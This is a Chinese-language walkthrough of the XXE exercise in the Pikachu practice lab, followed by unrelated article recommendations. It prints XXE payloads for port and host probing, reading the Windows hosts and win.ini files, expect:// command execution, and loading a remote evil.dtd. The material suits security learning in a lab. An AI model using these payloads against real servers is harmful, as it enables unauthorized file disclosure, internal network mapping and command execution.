Pikachu | XXE

利用xml注入的回显探测:

复制代码
<?xml version="1.0"?><!DOCTYPE root [ <!ENTITY xxe "test"> ]><root>&xxe;</root>

利用xml注入的端口探测:

payload:

复制代码
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPEroot[<!ENTITY xxe SYSTEM "http://192.168.x.x:8080">]><root>&xxe;</root>

利用burpsuite探测敏感端口:

端口探测的存活列表边界建议手动测试访问,根据响应时间可能不太准确。

对比nmap扫描出来的结果:

利用xml注入的内网主机探测:

复制代码
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://192.168.x.x" > ]><foo>&xxe;</foo>

同样利用BurpSuite对内网存活主机地址探测。

利用xml注入的敏感文件读取:

hosts读取:

*一般系统敏感文件是默认路径。

复制代码
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts" > ]><foo>&xxe;</foo>

hosts文件是本地DNS配置文件,用户在本地指定域名与IP的映射关系,优先级高于DNS服务器。用来发现内网域名、隐藏的测试系统或管理后台。利用该文件绕过CDN直接访问真实IP。

win.ini读取:

win.ini文件保留了系统配置信息,判断系统类型:存在fontsboot等字段即可确认windows。

复制代码
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini" > ]><foo>&xxe;</foo>

利用xml注入的命令执行:

复制代码
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://whoami" > ]><foo>&xxe;</foo>

利用xml注入的远程文件执行:

复制代码
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root SYSTEM "http://192.168.10.17:8086/evil.dtd"><root>&xxe;</root>

远程dtd payload:

复制代码
<!ENTITY xxe system "file:///C:/Windows/System32/drivers/etc/hosts">

这里没有回显不知道为什么。

相关推荐
zzzzzz31011 天前
9K Star 炸裂开源!这个 C 语言写的代码知识图谱,把 Linux 内核索引压缩到了 3 分钟
linux·服务器·sql
大树8814 天前
金刚石散热越强,管路越先见顶
大数据·运维·服务器·人工智能·ai
小宇宙Zz14 天前
Maven依赖冲突
java·服务器·maven
treesforest14 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
古城小栈15 天前
Unix 与 Linux 异同小叙
linux·服务器·unix
零零信安15 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
程序猿阿伟15 天前
《Chrome离线扩展安装的底层逻辑与场景落地指南》
服务器·网络·chrome
上海云盾第一敬业销售15 天前
深入解析WAF的工作原理与机制
web安全·ddos
凡人叶枫15 天前
Effective C++ 条款42:了解 typename 的双重意义
java·linux·服务器·c++
AC赳赳老秦15 天前
用 OpenClaw 搭建服务器故障应急响应系统,自动处理 80% 常见运维故障
android·运维·服务器·python·rxjava·deepseek·openclaw